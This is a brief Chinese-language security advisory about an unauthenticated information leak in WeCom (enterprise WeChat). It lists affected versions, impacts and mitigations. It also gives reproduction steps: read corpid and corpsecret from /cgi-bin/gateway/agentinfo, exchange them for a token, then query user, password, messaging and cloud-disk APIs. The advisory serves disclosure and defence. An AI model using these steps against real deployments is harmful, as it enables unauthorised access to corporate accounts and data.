紧急通知，长亭报出企业微信存在信息泄露0day！目前已在准备预警，请注意！

企业微信URL/cgi-bin/gateway/agentinfo

接口未授权情况下可直接获取企业微信secret等敏感信息

受影响版本：2.5.x、2.6.930000、以下；

不受影响：2.7.x、2.8.x、2.9.x；

危害：

1、可导致企业微信全量数据被获取、文件获取，

2、存在使用企业微信轻应用对内发送钓鱼文件和链接等风险。

修复方法：

1、在waf上设置一个规则，匹配到/cgi-bin/gateway/agentinfo路径的进行阻断；

2、联系厂家进行获取修复包；

3、官方通报及补丁地址

复现及漏洞详情分析：

第一步：，通过泄露信息接口可以获取corpid和corpsecret

https://<企业微信域名>/cgi-bin/gateway/agentinfo

第二步，使用corpsecret和corpid获得token

https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET

第三步，使用token访问诸如企业通讯录信息，修改用户密码，发送消息，云盘等接口

https://<企业微信域名>/cgi-bin/user/get?access_token=ACCESS_TOKEN&userid=USERID